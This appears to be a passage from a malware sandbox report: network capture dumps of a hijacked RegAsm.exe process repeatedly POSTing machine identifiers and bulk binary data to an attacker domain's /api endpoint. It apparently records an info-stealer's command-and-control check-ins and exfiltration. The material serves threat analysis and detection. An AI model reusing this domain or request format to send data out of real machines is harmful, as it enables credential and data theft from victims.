            2024-06-23 16:48:57 UTC1369INData Raw: 65 31 64 47 6f 69 52 7a 49 46 6e 67 68 53 4a 6f 79 50 73 52 44 4f 4b 58 6a 35 37 56 77 78 4d 77 57 2b 6d 42 77 43 62 35 46 36 57 37 46 68 62 79 74 4e 4a 41 61 4f 53 52 30 35 67 71 6d 59 4f 39 42 7a 65 4b 61 6a 58 45 78 53 55 71 4f 64 55 43 78 7a 67 33 6c 5a 74 58 52 68 4c 30 51 2b 42 35 38 42 56 69 7a 4a 78 50 56 61 79 6a 38 33 6f 4b 4d 59 48 52 34 62 36 4e 77 63 59 58 2b 66 4d 41 54 2f 4e 31 49 36 53 53 6f 47 6a 6b 74 74 4a 64 33 51 35 6c 33 5a 4e 33 71 4f 72 42 41 58 46 52 57 34 30 68 77 2b 4e 75 38 62 4e 36 51 31 4a 43 31 43 63 6c 50 63 53 56 38 69 77 4d 4c 30 58 73 59 38 4e 36 61 6b 45 78 34 65 41 4b 65 58 56 69 31 77 69 6d 4a 57 74 32 56 74 49 30 4d 38 41 34 77 4b 48 32 69 4f 67 66 52 49 69 57 6c 36 34 5a 30 57 46 78 77 45 70 5a 30 65 59 32 66 4a 47
            Data Ascii: e1dGoiRzIFnghSJoyPsRDOKXj57VwxMwW+mBwCb5F6W7FhbytNJAaOSR05gqmYO9BzeKajXExSUqOdUCxzg3lZtXRhL0Q+B58BVizJxPVayj83oKMYHR4b6NwcYX+fMAT/N1I6SSoGjkttJd3Q5l3ZN3qOrBAXFRW40hw+Nu8bN6Q1JC1CclPcSV8iwML0XsY8N6akEx4eAKeXVi1wimJWt2VtI0M8A4wKH2iOgfRIiWl64Z0WFxwEpZ0eY2fJG
            2024-06-23 16:48:57 UTC1369INData Raw: 70 43 30 4d 35 42 35 4d 47 56 47 61 43 71 5a 67 37 6f 6e 45 2b 34 66 64 65 52 46 35 36 77 2f 6b 31 59 58 79 57 4d 41 54 2f 4a 7a 5a 78 47 32 46 63 7a 6c 73 33 54 61 66 65 76 54 69 69 57 69 48 4a 78 48 64 2f 55 41 54 6f 79 68 78 7a 4e 75 38 62 4e 39 59 33 64 6d 6f 57 63 45 76 5a 43 6b 30 30 79 73 4c 6c 55 34 34 50 42 6f 4b 34 43 68 34 4c 55 49 36 56 54 79 68 75 69 6d 4a 69 67 31 6c 70 4b 30 30 38 53 61 38 66 55 6a 62 50 78 50 52 75 39 7a 38 2f 74 61 67 53 45 68 42 53 35 76 6f 31 53 68 50 48 66 78 7a 6c 4e 56 31 71 42 6e 49 30 30 47 45 30 54 61 65 42 36 78 43 52 63 33 69 55 72 42 49 61 46 77 53 35 33 33 30 32 62 6f 31 72 48 70 74 77 64 53 4e 59 50 78 6e 65 52 7a 64 4e 70 36 71 7a 56 6f 6c 70 65 76 48 68 64 48 39 37 65 65 69 57 54 32 45 67 78 53 41 4f 35 69
            Data Ascii: pC0M5B5MGVGaCqZg7onE+4fdeRF56w/k1YXyWMAT/JzZxG2Fczls3TafevTiiWiHJxHd/UAToyhxzNu8bN9Y3dmoWcEvZCk00ysLlU44PBoK4Ch4LUI6VTyhuimJig1lpK008Sa8fUjbPxPRu9z8/tagSEhBS5vo1ShPHfxzlNV1qBnI00GE0TaeB6xCRc3iUrBIaFwS53302bo1rHptwdSNYPxneRzdNp6qzVolpevHhdH97eeiWT2EgxSAO5i
            2024-06-23 16:48:57 UTC1369INData Raw: 63 6a 54 51 59 54 52 4e 70 34 48 72 45 4a 46 7a 65 4a 53 73 45 68 6f 58 42 4c 6e 66 65 53 39 2f 68 6d 5a 4d 73 48 74 46 4b 56 38 34 53 39 42 68 4e 45 32 6e 67 66 55 51 6b 58 4e 71 37 38 64 33 66 33 74 53 72 49 4d 65 65 54 72 58 49 67 66 6f 4a 44 4e 36 48 46 70 67 39 52 59 52 54 71 65 71 36 6a 69 69 57 6c 50 68 75 56 78 4d 55 6b 44 6d 2b 6a 56 4b 45 38 64 69 48 4f 55 31 4a 47 31 4e 49 42 6d 59 43 6b 6b 6c 69 2f 2f 4e 64 64 34 79 4b 4b 65 73 49 69 6f 37 48 71 36 56 52 43 5a 2b 6f 56 41 63 38 78 38 50 51 53 56 79 42 4e 35 52 48 52 2b 4d 69 62 4e 76 68 31 6c 54 79 73 52 63 44 46 42 4b 36 74 4a 72 49 6e 61 4a 64 30 71 73 4f 6b 45 39 54 53 49 4e 6e 55 6b 52 54 71 65 71 6d 42 44 50 63 57 44 6a 2f 31 4a 38 65 33 6e 44 30 6c 6f 77 4f 4e 38 79 44 4f 38 73 4d 58 6b
            Data Ascii: cjTQYTRNp4HrEJFzeJSsEhoXBLnfeS9/hmZMsHtFKV84S9BhNE2ngfUQkXNq78d3f3tSrIMeeTrXIgfoJDN6HFpg9RYRTqeq6jiiWlPhuVxMUkDm+jVKE8diHOU1JG1NIBmYCkkli//Ndd4yKKesIio7Hq6VRCZ+oVAc8x8PQSVyBN5RHR+MibNvh1lTysRcDFBK6tJrInaJd0qsOkE9TSINnUkRTqeqmBDPcWDj/1J8e3nD0lowON8yDO8sMXk


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.549709104.21.90.184435592C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            TimestampBytes transferredDirectionData
            2024-06-23 16:48:58 UTC286OUTPOST /api HTTP/1.1
            Connection: Keep-Alive
            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Content-Length: 12846
            Host: backcreammykiel.shop
            2024-06-23 16:48:58 UTC12846OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 39 39 34 38 46 32 46 44 44 36 36 33 34 44 31 45 39 42 43 35 44 34 43 46 36 33 42 43 33 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6e 65 76 65
            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"039948F2FDD6634D1E9BC5D4CF63BC37--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@neve
            2024-06-23 16:48:58 UTC816INHTTP/1.1 200 OK
            Date: Sun, 23 Jun 2024 16:48:58 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: PHPSESSID=pbdmgtrrjv6r82ph25t4t825v6; expires=Thu, 17-Oct-2024 10:35:37 GMT; Max-Age=9999999; path=/
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KIykqsr7lSDR1GAO8GrPAQa2NdSXUW12s70zm6%2FQ48wkPgKwEQC9dBXEdTf3FKn%2BvMTK%2FxK2MrpytpQgy279SYDRALeZr3TWp2bjk%2Bcip%2BzQaE77%2BMjp8svKhH%2BFWE8yxMq5ShmUaA%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8985f7fc7b6e72b7-EWR
            alt-svc: h3=":443"; ma=86400
            2024-06-23 16:48:58 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
            Data Ascii: eok 8.46.123.33
            2024-06-23 16:48:58 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.549713104.21.90.184435592C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            TimestampBytes transferredDirectionData
            2024-06-23 16:48:59 UTC286OUTPOST /api HTTP/1.1
            Connection: Keep-Alive
            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Content-Length: 15088
            Host: backcreammykiel.shop
            2024-06-23 16:48:59 UTC15088OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 39 39 34 38 46 32 46 44 44 36 36 33 34 44 31 45 39 42 43 35 44 34 43 46 36 33 42 43 33 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6e 65 76 65
            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"039948F2FDD6634D1E9BC5D4CF63BC37--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@neve
            2024-06-23 16:48:59 UTC808INHTTP/1.1 200 OK
            Date: Sun, 23 Jun 2024 16:48:59 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: PHPSESSID=d5fckp8mumm7nbo4b97gubi3tp; expires=Thu, 17-Oct-2024 10:35:38 GMT; Max-Age=9999999; path=/
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DDIKTaop%2FNrpS%2FiXQMqgnIU8tkMoalzSyO%2B0T7R3GSXXFa8gUphiN3eZZ6bWd3jEsQ2tkMNPV3G9OB1vIHtqzuIIsuCETaP37kram5hhMoPjKIDsk3mYb0bHJ9S58ZJ4p5TVAfTezA%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8985f802385b4245-EWR
            alt-svc: h3=":443"; ma=86400
            2024-06-23 16:48:59 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
            Data Ascii: eok 8.46.123.33
            2024-06-23 16:48:59 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.549715104.21.90.184435592C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            TimestampBytes transferredDirectionData
            2024-06-23 16:49:00 UTC286OUTPOST /api HTTP/1.1
            Connection: Keep-Alive
            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Content-Length: 20578
            Host: backcreammykiel.shop
            2024-06-23 16:49:00 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 39 39 34 38 46 32 46 44 44 36 36 33 34 44 31 45 39 42 43 35 44 34 43 46 36 33 42 43 33 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6e 65 76 65
            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"039948F2FDD6634D1E9BC5D4CF63BC37--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@neve
            2024-06-23 16:49:00 UTC5247OUTData Raw: b1 05 a9 66 42 b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii: fBZ>56vMMZh'F3Wun 4F([:7s~X`nO
            2024-06-23 16:49:01 UTC810INHTTP/1.1 200 OK
            Date: Sun, 23 Jun 2024 16:49:01 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: PHPSESSID=8ekqsgvtvo6vbss5eg60u6jvbc; expires=Thu, 17-Oct-2024 10:35:39 GMT; Max-Age=9999999; path=/
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7zPb2w5pPfhbhHzUqTjCL%2F%2B1mhJfqdP1qlsyj0ps4aW9z%2B2IUjSGUuU4O7xH2wNGb6Yc1FebBxWSnw38Qj6aNOIP8lzzItxEZgtmvbDs2xIvzKuA7Ufi76dhGe6%2FZexrYoDgpHtbfg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8985f80a2d4972b3-EWR
            alt-svc: h3=":443"; ma=86400
            2024-06-23 16:49:01 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
            Data Ascii: eok 8.46.123.33
            2024-06-23 16:49:01 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.549716104.21.90.184435592C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            TimestampBytes transferredDirectionData
            2024-06-23 16:49:01 UTC285OUTPOST /api HTTP/1.1
            Connection: Keep-Alive
            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Content-Length: 5455
            Host: backcreammykiel.shop
            2024-06-23 16:49:01 UTC5455OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 39 39 34 38 46 32 46 44 44 36 36 33 34 44 31 45 39 42 43 35 44 34 43 46 36 33 42 43 33 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6e 65 76 65
            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"039948F2FDD6634D1E9BC5D4CF63BC37--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@neve
            2024-06-23 16:49:02 UTC814INHTTP/1.1 200 OK
            Date: Sun, 23 Jun 2024 16:49:02 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: PHPSESSID=8tcqj7s5a315t1e54vru63shb4; expires=Thu, 17-Oct-2024 10:35:41 GMT; Max-Age=9999999; path=/
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pI5F2dllQLU5Ur4TNS56%2FJNDLHj22T4AFsoVORKApMEKyeZC%2B%2BUJl%2BkoIdzUc7gBgXMnOf2VhwPOKJvuZsJb0JC2zqkje2UQBQ0JmEox1cUMr16ByLM%2BcMaxW73azppXEUl%2FPtBFXg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8985f812bd394408-EWR
            alt-svc: h3=":443"; ma=86400
            2024-06-23 16:49:02 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
            Data Ascii: eok 8.46.123.33
            2024-06-23 16:49:02 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.549717104.21.90.184435592C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            TimestampBytes transferredDirectionData
            2024-06-23 16:49:02 UTC285OUTPOST /api HTTP/1.1
            Connection: Keep-Alive
            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Content-Length: 1286
            Host: backcreammykiel.shop
            2024-06-23 16:49:02 UTC1286OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 39 39 34 38 46 32 46 44 44 36 36 33 34 44 31 45 39 42 43 35 44 34 43 46 36 33 42 43 33 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6e 65 76 65
            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"039948F2FDD6634D1E9BC5D4CF63BC37--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@neve
            2024-06-23 16:49:03 UTC808INHTTP/1.1 200 OK
            Date: Sun, 23 Jun 2024 16:49:03 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: PHPSESSID=ih4jpatbd363ep7c8c3gor53i6; expires=Thu, 17-Oct-2024 10:35:42 GMT; Max-Age=9999999; path=/
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FiP%2B70eoUp5ltbxjeSZdBX%2BRKHObsnveVWioQhoDUR5sHat10DiLb8ZoB8nHi6T6uPw3S9kb1kCr46aXd6nswxwgWU4ZYTVNiNdfRT69levpA4K9kTWMKgRz28UEuGCPWRpWYD3dg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8985f819cbc54219-EWR
            alt-svc: h3=":443"; ma=86400
            2024-06-23 16:49:03 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
            Data Ascii: eok 8.46.123.33
            2024-06-23 16:49:03 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.549718104.21.90.184435592C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            TimestampBytes transferredDirectionData
            2024-06-23 16:49:04 UTC287OUTPOST /api HTTP/1.1
            Connection: Keep-Alive
            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Content-Length: 568554
            Host: backcreammykiel.shop
            2024-06-23 16:49:04 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 39 39 34 38 46 32 46 44 44 36 36 33 34 44 31 45 39 42 43 35 44 34 43 46 36 33 42 43 33 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6e 65 76 65
            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"039948F2FDD6634D1E9BC5D4CF63BC37--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@neve
            2024-06-23 16:49:04 UTC15331OUTData Raw: 42 e7 c9 22 02 12 fa b3 73 64 fa 10 38 01 96 08 9b 02 62 f5 48 76 c7 6d 39 49 98 8f f7 67 e7 cb a1 56 15 d7 8f 1a ff c9 95 68 34 2d 70 c3 36 d0 eb 9d 34 48 9a 4f 6e 24 ca 50 93 a4 7e d7 0a b2 68 10 e6 d9 5a 6e 34 f4 b6 4f 7d 4c c0 e5 dc 2a e4 9d d6 00 2f 8d 08 eb 72 84 ee e9 3e a6 38 2d 98 a5 ba 61 a6 b4 7b e1 49 5c 67 49 0e 16 d6 5b b2 c8 2d da 99 f0 72 3b 9d 37 39 43 a9 92 9d 2e 51 5c bd c7 0a cf 9a 63 05 aa 84 ec 9a 29 df 0e 53 61 63 7e a0 36 e1 d8 69 35 0e 4d 9d 60 de c2 2d 8a 81 6f 45 78 16 fb 8e 90 ff c1 d8 b5 5b fa 88 0e 6b 08 0f 49 54 4f dc 6a 0c 68 c7 6d be 23 ce bd 8f d3 c4 47 a3 b6 0a 05 13 4e 31 31 64 e7 0f cf 12 2d 8e eb 5e 59 82 1c db 2d 6a 52 83 6b 96 6d f9 51 9c 8c 51 52 5e ec fc 9d 11 85 e6 bb 2c b3 89 c6 4d 5d 8b f7 6b ea 19 d5 a1 7e 49
            Data Ascii: B"sd8bHvm9IgVh4-p64HOn$P~hZn4O}L*/r>8-a{I\gI[-r;79C.Q\c)Sac~6i5M`-oEx[kITOjhm#GN11d-^Y-jRkmQQR^,M]k~I
            2024-06-23 16:49:04 UTC15331OUTData Raw: 5d 0e ef f6 e6 40 63 5f 2b 9d 9c d8 af 0b 2c e4 83 cb 86 5a c1 0e cc 0b 67 cb 66 0a 91 aa 11 c9 bd 35 ad ee c4 c9 67 1d 69 36 96 5a 38 3f ae 78 dc 90 40 d8 7d a7 9a 1c 4b 5a 4a ee 8f f4 be ff 83 11 25 cb 9f 10 09 19 a8 a1 94 f2 94 db 1d ff eb 36 39 1a e6 99 ef 17 1a ee 63 07 a5 a3 8c 02 d5 83 cd 1a 82 8a 08 18 b6 58 d7 e3 2f 2b ca 09 91 35 46 08 af 72 22 dc aa b7 4a 7f 1e cd 79 52 2a 0c 6d 12 78 bb 5c ed 12 f9 08 c3 0a 36 8c d0 80 a8 f5 37 cd 77 44 03 8b 55 57 9b 03 e8 e8 5d 43 65 2a 72 45 5b f1 3b 15 43 61 af 31 c5 81 60 eb b7 81 d3 0a 56 eb af 18 16 bf 36 62 6d 76 a3 76 a8 9e dd de c8 f3 1f 75 76 cd 4d 8c 2f 8d bc b3 fe b8 7c 7d 2c 71 e0 e4 a1 81 9f 81 eb 6f 19 9e ec 2f cf 7e 4b a8 db 0e 1e 00 15 0b ab f6 25 2a d7 6d 46 5b 53 03 1f ea ff fa ef 2c 6a 6d
            Data Ascii: ]@c_+,Zgf5gi6Z8?x@}KZJ%69cX/+5Fr"JyR*mx\67wDUW]Ce*rE[;Ca1`V6bmvvuvM/|},qo/~K%*mF[S,jm
